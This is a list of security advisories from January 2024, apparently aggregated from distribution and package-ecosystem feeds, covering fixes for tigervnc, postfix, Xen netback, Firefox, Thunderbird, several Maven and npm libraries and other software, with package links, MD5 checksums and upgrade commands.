21.01.2024 22:53:54	slackware	[SSA:2024-021-01] tigervnc (high)	New tigervnc packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```extra/tigervnc/tigervnc-1.12.0-i586-5_slack15.0.txz: Rebuilt. Recompiled against xorg-server-1.20.14, including the latest patches for several security issues. Thanks to marav. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-6377 https://www.cve.org/CVERecord?id=CVE-2023-6478 https://www.cve.org/CVERecord?id=CVE-2023-6816 https://www.cve.org/CVERecord?id=CVE-2024-0229 https://www.cve.org/CVERecord?id=CVE-2024-0408 https://www.cve.org/CVERecord?id=CVE-2024-0409 https://www.cve.org/CVERecord?id=CVE-2024-21885 https://www.cve.org/CVERecord?id=CVE-2024-21886 https://www.cve.org/CVERecord?id=CVE-2024-21886 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/tigervnc/tigervnc-1.12.0-i586-5_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/tigervnc/tigervnc-1.12.0-x86_64-5_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/extra/tigervnc/tigervnc-1.13.1-i586-3.txzUpdated packages for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/extra/tigervnc/tigervnc-1.13.1-x86_64-3.txzMD5 signaturesSlackware 15.0 package:13a4377260bd096461166e37ca16afe7 tigervnc-1.12.0-i586-5_slack15.0.txzSlackware x86_64 15.0 package:a942377a4d2c2b4b80a556eb81e5d97f tigervnc-1.12.0-x86_64-5_slack15.0.txzSlackware -current package:2716715cb2d3d87c4eeb0141d2e1b7ae tigervnc-1.13.1-i586-3.txzSlackware x86_64 -current package:2cd2eb06417478d62768c6f0a67f9550 tigervnc-1.13.1-x86_64-3.txzInstallation instructions*Upgrade the package as root:`# upgradepkg tigervnc-1.12.0-i586-5_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-021-01
21.01.2024 16:51:38	rustsec	[RUSTSEC-2024-0004] `cosmwasm` is unmaintained	The crate `cosmwasm` is [not used anymore] since spring 2020.The functionality was split in multiple different crates, such as the standard library `cosmwasm-std` and the virtual machine `cosmwasm-vm`. An overview can be found in the [cosmwasm repository].If you have this crate in your dependency tree, this is very likely by mistake and should be corrected.[not used anymore]: https://github.com/CosmWasm/cosmwasm/issues/1430[cosmwasm repository]: https://github.com/CosmWasm/cosmwasm	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0004
22.01.2024 23:02:39	slackware	[SSA:2024-022-01] postfix	New postfix packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/postfix-3.6.14-i586-1_slack15.0.txz: Upgraded. Security (inbound SMTP smuggling): with "smtpd_forbid_bare_newline = normalize" (default "no" for Postfix < 3.9), the Postfix SMTP server requires the standard End-of-DATA sequence <CR><LF>.<CR><LF>, and otherwise allows command or message content lines ending in the non-standard <LF>, processing them as if the client sent the standard <CR><LF>. The alternative setting, "smtpd_forbid_bare_newline = reject" will reject any command or message that contains a bare <LF>, and is more likely to cause problems with legitimate clients. For backwards compatibility, local clients are excluded by default with "smtpd_forbid_bare_newline_exclusions = $mynetworks". For more information, see: https://www.postfix.org/smtp-smuggling.html (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/postfix-3.6.14-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/postfix-3.6.14-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/postfix-3.8.5-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/postfix-3.8.5-x86_64-1.txzMD5 signaturesSlackware 15.0 package:294738922ff08821267867f0bc877f20 postfix-3.6.14-i586-1_slack15.0.txzSlackware x86_64 15.0 package:e82bb102cc325850e48aca41f909e812 postfix-3.6.14-x86_64-1_slack15.0.txzSlackware -current package:7e088581a14eb986f767bc08d9203103 n/postfix-3.8.5-i586-1.txzSlackware x86_64 -current package:50f7d14d0ddc0ce62e29cb55a2cffa31 n/postfix-3.8.5-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg postfix-3.6.14-i586-1_slack15.0.txz`Restart the postfix server:`# /etc/rc.d/rc.postfix restart`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-022-01
22.01.2024 20:30:00	xen	[XSA-448] Linux: netback processing of zero-length transmit fragment	ISSUE DESCRIPTIONTransmit requests in Xen's virtual network protocol can consist ofmultiple parts. While not really useful, except for the initial partany of them may be of zero length, i.e. carry no data at all. Besides acertain initial portion of the to be transferred data, these parts aredirectly translated into what Linux calls SKB fragments. Such convertedrequest parts can, when for a particular SKB they are all of lengthzero, lead to a de-reference of NULL in core networking code.IMPACTAn unprivileged guest can cause Denial of Service (DoS) of the host bysending network packets to the backend, causing the backend to crash.Data corruption or privilege escalation have not been ruled out.VULNERABLE SYSTEMSAll systems using a Linux based network backend with kernel 4.14 andnewer are vulnerable. Earlier versions may also be vulnerable. Systemsusing other network backends are not known to be vulnerable.	https://secdb.nttzen.cloud/security-advisory/xen/XSA-448
22.01.2024 15:16:42	ubuntu	[USN-6593-1] GnuTLS vulnerabilities (medium)	Several security issues were fixed in GnuTLS.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6593-1
22.01.2024 15:13:33	ubuntu	[USN-6587-2] X.Org X Server vulnerabilities (high)	Several security issues were fixed in X.Org X Server.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6587-2
22.01.2024 15:05:30	ubuntu	[USN-6592-1] libssh vulnerabilities (medium)	Several security issues were fixed in libssh.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6592-1
22.01.2024 14:35:30	ubuntu	[USN-6591-1] Postfix vulnerability (medium)	Postfix could allow bypass of email authentication if it receivedspecially crafted network traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6591-1
22.01.2024 23:25:53	maven	[MAVEN:GHSA-JGXC-8MWQ-9XQW] Clojure classes can be used to craft a serialized object that runs arbitrary code on deserialization (critical)	In Clojure before 1.9.0, classes can be used to construct a serialized object that executes arbitrary code upon deserialization. This is relevant if a server deserializes untrusted objects.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JGXC-8MWQ-9XQW
22.01.2024 10:01:31	almalinux	[ALSA-2024:0310] openssl security update (moderate)	openssl security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0310
22.01.2024 02:00:00	cisa	[CISA-2024:0122] CISA Adds One Known Exploited Vulnerability to Catalog (critical)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0122
22.01.2024 02:00:00	gentoo	[GLSA-202401-26] Apache XML-RPC: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been found in Apache XML-RPC, the worst of which could result in arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-26
22.01.2024 02:00:00	oraclelinux	[ELSA-2024-0267] java-17-openjdk security and bug fix update (important)	[1:17.0.10.0.7-2.0.1]- Rebase to 17.0.10.0.7	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0267
22.01.2024 02:00:00	redhat	[RHSA-2024:0310] openssl security update (moderate)	OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.Security Fix(es):* openssl: Incorrect cipher key and IV length processing (CVE-2023-5363)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0310
22.01.2024 02:00:00	redhat	[RHSA-2024:0320] xorg-x11-server security update (important)	X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon.Security Fix(es):* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)* xorg-x11-server: SELinux unlabeled GLX PBuffer (CVE-2024-0408)* xorg-x11-server: SELinux context corruption (CVE-2024-0409)* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0320
22.01.2024 23:32:19	npm	[NPM:GHSA-FH38-9FGR-454W] Cross-site Scripting in Ghost (moderate)	Ghost before 5.76.0 allows XSS via a post excerpt in excerpt.js. An XSS payload can be rendered in post summaries.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FH38-9FGR-454W
22.01.2024 07:34:54	rustsec	[RUSTSEC-2024-0006] Multiple issues involving quote API	## Issue 1: Failure to quote charactersAffected versions of this crate allowed the bytes `{` and `\xa0` to appearunquoted and unescaped in command arguments.If the output of `quote` or `join` is passed to a shell, then what should be asingle command argument could be interpreted as multiple arguments.This does not directly allow arbitrary command execution (you can't inject acommand substitution or similar). But depending on the command you're running,being able to inject multiple arguments where only one is expected could leadto undesired consequences, potentially including arbitrary command execution.The flaw was corrected in version 1.2.1 by escaping additional characters.Updating to 1.3.0 is recommended, but 1.2.1 offers a more minimal fix ifdesired.Workaround: Check for the bytes `{` and `\xa0` in `quote`/`join` input oroutput.(Note: `{` is problematic because it is used for glob expansion. `\xa0` isproblematic because it's treated as a word separator in [specificenvironments][solved-xa0].)## Issue 2: Dangerous API w.r.t. nul bytesVersion 1.3.0 deprecates the `quote` and `join` APIs in favor of `try_quote`and `try_join`, which behave the same except that they have `Result` returntype, returning `Err` if the input contains nul bytes.Strings containing nul bytes generally cannot be used in Unix command argumentsor environment variables, and most shells cannot handle nul bytes eveninternally. If you try to pass one anyway, then the results might besecurity-sensitive in uncommon scenarios. [More details here.][nul-bytes]Due to the low severity, the behavior of the original `quote` and `join` APIshas not changed; they continue to allow nuls.Workaround: Manually check for nul bytes in `quote`/`join` input or output.## Issue 3: Lack of documentation for interactive shell risksThe `quote` family of functions does not and cannot escape control characters.With non-interactive shells this is perfectly safe, as control characters haveno special effect. But if you writing directly to the standard input of aninteractive shell (or through a pty), then control characters [can causemisbehavior including arbitrary command injection.][control-characters]This is essentially unfixable, and has not been patched. But as of version1.3.0, documentation has been added.Future versions of `shlex` may add API variants that avoid the issue at thecost of reduced portability.[solved-xa0]: https://docs.rs/shlex/latest/shlex/quoting_warning/index.html#solved-xa0[nul-bytes]: https://docs.rs/shlex/latest/shlex/quoting_warning/index.html#nul-bytes[control-characters]: https://docs.rs/shlex/latest/shlex/quoting_warning/index.html#control-characters-interactive-contexts-only	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0006
22.01.2024 23:24:45	maven	[MAVEN:GHSA-9RHQ-86FM-QXQC] Hard-coded credentials in org.folio:mod-data-export-spring (high)	Hard-coded credentials in FOLIO mod-data-export-spring versions before 1.5.4 and from 2.0.0 to 2.0.2 allows unauthenticated users to access critical APIs, modify user data, modify configurations including single-sign-on, and manipulate fees/fines.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9RHQ-86FM-QXQC
22.01.2024 23:31:05	maven	[MAVEN:GHSA-HJ55-9JMV-9JRJ] Sandbox escape in Artemis Java Test Sandbox (moderate)	Artemis Java Test Sandbox versions before 1.8.0 are vulnerable to a sandbox escape when an attacker includes class files in a package that Ares trusts. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HJ55-9JMV-9JRJ
22.01.2024 23:25:13	maven	[MAVEN:GHSA-C4PG-5GGH-VCPP] Sandbox escape in Artemis Java Test Sandbox (high)	Artemis Java Test Sandbox versions before 1.11.2 are vulnerable to a sandbox escape when an attacker loads untrusted libraries using System.load or System.loadLibrary. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C4PG-5GGH-VCPP
24.01.2024 07:03:37	slackware	[SSA:2024-023-02] mozilla-thunderbird	New mozilla-thunderbird packages are available for Slackware 15.0 and -currentto fix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-thunderbird-115.7.0-i686-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/thunderbird/115.7.0/releasenotes/ https://www.mozilla.org/en-US/security/advisories/mfsa2024-04/ https://www.cve.org/CVERecord?id=CVE-2024-0741 https://www.cve.org/CVERecord?id=CVE-2024-0742 https://www.cve.org/CVERecord?id=CVE-2024-0746 https://www.cve.org/CVERecord?id=CVE-2024-0747 https://www.cve.org/CVERecord?id=CVE-2024-0749 https://www.cve.org/CVERecord?id=CVE-2024-0750 https://www.cve.org/CVERecord?id=CVE-2024-0751 https://www.cve.org/CVERecord?id=CVE-2024-0753 https://www.cve.org/CVERecord?id=CVE-2024-0755 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.7.0-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.7.0-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-115.7.0-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-115.7.0-x86_64-1.txzMD5 signaturesSlackware 15.0 package:c973c630024420493821cc1de3621f4c mozilla-thunderbird-115.7.0-i686-1_slack15.0.txzSlackware x86_64 15.0 package:19d0d370f4b37d7e656ad15f7b8ba658 mozilla-thunderbird-115.7.0-x86_64-1_slack15.0.txzSlackware -current package:89beaf8081d0fd670f3aef2399e0704c xap/mozilla-thunderbird-115.7.0-i686-1.txzSlackware x86_64 -current package:51dc2baf46f4656f72201f335a7ce1be xap/mozilla-thunderbird-115.7.0-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-thunderbird-115.7.0-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-023-02
23.01.2024 22:15:17	slackware	[SSA:2024-023-01] mozilla-firefox	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-115.7.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.7.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-02/ https://www.cve.org/CVERecord?id=CVE-2024-0741 https://www.cve.org/CVERecord?id=CVE-2024-0742 https://www.cve.org/CVERecord?id=CVE-2024-0746 https://www.cve.org/CVERecord?id=CVE-2024-0747 https://www.cve.org/CVERecord?id=CVE-2024-0749 https://www.cve.org/CVERecord?id=CVE-2024-0750 https://www.cve.org/CVERecord?id=CVE-2024-0751 https://www.cve.org/CVERecord?id=CVE-2024-0753 https://www.cve.org/CVERecord?id=CVE-2024-0755 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.7.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.7.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-115.7.0esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-115.7.0esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:570da9d6b89f74e5cbffbb710f67b808 mozilla-firefox-115.7.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:7f9fb29d0e70cfb0657b5c1daec04b2b mozilla-firefox-115.7.0esr-x86_64-1_slack15.0.txzSlackware -current package:072c32ab7c1e31596d535e0d8ed3df71 xap/mozilla-firefox-115.7.0esr-i686-1.txzSlackware x86_64 -current package:737830d32596d7c6fa544f22babad0f4 xap/mozilla-firefox-115.7.0esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-115.7.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-023-01
23.01.2024 22:10:22	maven	[MAVEN:GHSA-7Q8P-9953-PXVR] Remote Command Execution in SOFARPC (critical)	ImpactSOFARPC defaults to using the SOFA Hessian protocol to deserialize received data, while the SOFA Hessian protocol uses a blacklist mechanism to restrict deserialization of potentially dangerous classes for security protection. But there is a gadget chain that can bypass the SOFA Hessian blacklist protection mechanism, and this gadget chain only relies on JDK and does not rely on any third-party components.PatchesFixed this issue by adding a blacklist, users can upgrade to sofarpc version 5.12.0 to avoid this issue.WorkaroundsSOFARPC also provides a way to add additional blacklist. Users can add some class like -Drpc_serialize_blacklist_override=org.apache.xpath. to avoid this issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7Q8P-9953-PXVR
23.01.2024 22:11:28	maven	[MAVEN:GHSA-V9WR-2XRG-V7W8] Cross-site Scripting in beetl-bbs (moderate)	Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the /index keyword parameter.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V9WR-2XRG-V7W8
23.01.2024 22:11:20	maven	[MAVEN:GHSA-V435-PFJ6-68R3] Cross-site Scripting in JFinal (moderate)	Cross Site Scripting (XSS) vulnerability in JFinalcms 5.0.0 allows attackers to run arbitrary code via the /admin/login username parameter.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V435-PFJ6-68R3
23.01.2024 20:26:40	go	[GO-2024-2471] Chain halt panic in github.com/cometbft/cometbft	A vulnerability in CometBFT’s validation logic for VoteExtensionsEnableHeightcan result in a chain halt when triggered through a governance parameter changeproposal on an ABCI2 Application Chain. If a parameter change proposal includinga VoteExtensionsEnableHeight modification is passed, nodes running the affectedversions may panic, halting the network.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2471
23.01.2024 16:43:50	maven	[MAVEN:GHSA-9VM7-V8WJ-3FQW] keycloak-core: open redirect via "form_post.jwt" JARM response mode (moderate)	An incomplete fix was found in Keycloak Core patch. An attacker can steal authorization codes or tokens from clients using a wildcard in the JARM response mode "form_post.jwt". It is observed that changing the response_mode parameter in the original proof of concept from "form_post" to "form_post.jwt" can bypass the security patch implemented to address CVE-2023-6134.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9VM7-V8WJ-3FQW
23.01.2024 16:43:14	npm	[NPM:GHSA-4C2G-HX49-7H25] Prototype pollution not blocked by object-path related utilities in hoolock (moderate)	### ImpactUtility functions related to object paths (`get`, `set` and `update`) did not block attempts to access or alter object prototypes.### PatchesThe `get`, `set` and `update` functions will throw a `TypeError` when a user attempts to access or alter inherited properties in versions >=2.2.1.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4C2G-HX49-7H25
23.01.2024 16:42:52	npm	[NPM:GHSA-RJQ5-W47X-X359] @hono/node-server cannot handle "double dots" in URL (moderate)	### ImpactSince v1.3.0, we use our own Request object. This is great, but the `url` behavior is unexpected.In the standard API, if the URL contains `..`, here called "double dots", the URL string returned by Request will be in the resolved path.```tsconst req = new Request('http://localhost/static/../foo.txt') // Web-standardsconsole.log(req.url) // http://localhost/foo.txt```However, the `url` in our Request does not resolve double dots, so `http://localhost/static/.. /foo.txt` is returned.```tsconst req = new Request('http://localhost/static/../foo.txt')console.log(req.url) // http://localhost/static/../foo.txt```It will pass unresolved paths to the web application. This causes vulnerabilities like #123 when using `serveStatic`.Note: Modern web browsers and a latest `curl` command resolve double dots on the client side, so it does not affect you if the user uses them. However, problems may occur if accessed by a client that does not resolve them.### Patches"v1.4.1" includes the change to fix this issue.### WorkaroundsDon't use `serveStatic`.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RJQ5-W47X-X359
23.01.2024 15:39:22	ubuntu	[USN-6595-1] PyCryptodome vulnerability (medium)	PyCryptodome could be made to expose sensitive information.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6595-1
23.01.2024 05:05:16	ubuntu	[USN-6594-1] Squid vulnerabilities (high)	Several security issues were fixed in Squid.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6594-1
23.01.2024 02:00:00	cisa	[CISA-2024:0123] CISA Adds One Known Exploited Vulnerability to Catalog	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0123
23.01.2024 02:00:00	debian	[DSA-5603-1] xorg-server (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5603-1
23.01.2024 02:00:00	debian	[DSA-5604-1] openjdk-11 (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5604-1
23.01.2024 02:00:00	oraclelinux	[ELSA-2024-0266] java-11-openjdk security update (important)	[1:11.0.22.0.7-2.0.1]- Update to openjdk-11.0.22+7	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0266
23.01.2024 02:00:00	oraclelinux	[ELSA-2024-0343] LibRaw security update (moderate)	[0.19.4-2]- Fix CVE-2021-32142- Resolves: RHEL-9524	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0343
23.01.2024 02:00:00	oraclelinux	[ELSA-2024-0345] python-pillow security update (moderate)	[2.0.0-24gitd1c6db8]- Security fix for CVE-2023-44271Resolves: RHEL-15459	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0345
23.01.2024 16:44:08	maven	[MAVEN:GHSA-R4Q3-7G4Q-X89M] Spring Framework server Web DoS Vulnerability (high)	In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.Specifically, an application is vulnerable when all of the following are true: * the application uses Spring MVC * Spring Security 6.1.6+ or 6.2.1+ is on the classpathTypically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R4Q3-7G4Q-X89M
23.01.2024 16:36:58	maven	[MAVEN:GHSA-FRXM-V7Q3-V2WV] Insertion of Sensitive Information into Log File in OWASP DependencyCheck (moderate)	DependencyCheck for Maven 9.0.0 to 9.0.6, for CLI version 9.0.0 to 9.0.5, and for Ant versions 9.0.0 to 9.0.5, when used in debug mode, allows an attacker to recover the NVD API Key from a log file.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FRXM-V7Q3-V2WV
23.01.2024 16:35:55	maven	[MAVEN:GHSA-HV5G-Q4H3-64Q4] Hard-coded credentials in org.folio:mod-remote-storage (moderate)	Hard-coded credentials in mod-remote-storage versions under 1.7.2 and from 2.0.0 to 2.0.3 allows unauthorized users to gain read access to mod-inventory-storage records including instances, holdings, items, contributor-types, and identifier-types.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HV5G-Q4H3-64Q4
23.01.2024 16:36:37	maven	[MAVEN:GHSA-HFJ8-63C8-RMFW] Inefficient Algorithmic Complexity in com.upokecenter:cbor (high)	Inefficient algorithmic complexity in DecodeFromBytes function in com.upokecenter.cbor Java implementation of Concise Binary Object Representation (CBOR) versions 4.0.0 to 4.5.1 allows an attacker to cause a denial of service by passing a maliciously crafted input. Depending on an application's use of this library, this may be a remote attacker.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HFJ8-63C8-RMFW
23.01.2024 16:36:15	maven	[MAVEN:GHSA-GVC7-GJRW-HJ65] Improper Verification of Cryptographic Signature in aws-encryption-sdk-java (moderate)	AWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-GVC7-GJRW-HJ65
23.01.2024 16:35:12	maven	[MAVEN:GHSA-WC6F-QJXC-622V] JavaScript execution via malicious molfiles (XSS) (moderate)	MolecularFaces before 0.3.0 is vulnerable to cross site scripting. A remote attacker can execute arbitrary JavaScript in the context of a victim browser via crafted molfiles.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-WC6F-QJXC-622V
23.01.2024 16:34:55	maven	[MAVEN:GHSA-3P77-WG4C-QM24] Exposure of sensitive information in ClickHouse (moderate)	Exposure of sensitive information in exceptions in ClickHouse's clickhouse-r2dbc, com.clickhouse:clickhouse-jdbc, and com.clickhouse:clickhouse-client versions less than 0.4.6 allows unauthorized users to gain access to client certificate passwords via client exception logs. This occurs when 'sslkey' is specified and an exception, such as a ClickHouseException or SQLException, is thrown during database operations; the certificate password is then included in the logged exception message.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3P77-WG4C-QM24
23.01.2024 16:34:39	maven	[MAVEN:GHSA-23RX-79R7-6CPX] Sandbox escape in Artemis Java Test Sandbox (moderate)	Artemis Java Test Sandbox versions less than 1.7.6 are vulnerable to a sandbox escape when an attacker crafts a special subclass of InvocationTargetException. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-23RX-79R7-6CPX
23.01.2024 16:45:36	rustsec	[RUSTSEC-2024-0007] Use-after-free when setting the locale	Version 3.0.0 introduced an `AtomicStr` type, that is used to store the current locale.It stores the locale as a raw pointer to an `Arc<String>`.The locale can be read with `AtomicStr::as_str()`.`AtomicStr::as_str()` does not increment the usage counter of the `Arc`.If the locale is changed in one thread, another thread can have a stale -- possibly already freed --reference to the stored string.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0007
23.01.2024 22:10:33	maven	[MAVEN:GHSA-32Q4-86G8-6637] Stored Cross Site Scripting in beetl-bbs (moderate)	A Stored Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the post/save content parameter.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-32Q4-86G8-6637
23.01.2024 22:11:07	maven	[MAVEN:GHSA-H57W-VH34-F8CW] Code injection in mingSoft MCMS (high)	An issue in mingSoft MCMS v.5.2.4 allows a a remote attacker to obtain sensitive information via a crafted script to the password parameter.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H57W-VH34-F8CW
23.01.2024 16:38:05	maven	[MAVEN:GHSA-859H-4W58-78XW] Cross-site Scripting in JFinal (moderate)	A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save contact parameter, which allows remote attackers to inject arbitrary web script or HTML.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-859H-4W58-78XW
23.01.2024 16:37:45	maven	[MAVEN:GHSA-3J4X-9Q9Q-3277] Cross-site Scripting in JFinal (moderate)	A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save content parameter, which allows remote attackers to inject arbitrary web script or HTML.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3J4X-9Q9Q-3277
24.01.2024 23:52:44	maven	[MAVEN:GHSA-QJPF-2JHX-3758] Arbitrary file read vulnerability in Jenkins Log Command Plugin (high)	Jenkins Log Command Plugin 1.0.2 and earlier does not disable a feature of its command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read content from arbitrary files on the Jenkins controller file system.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QJPF-2JHX-3758
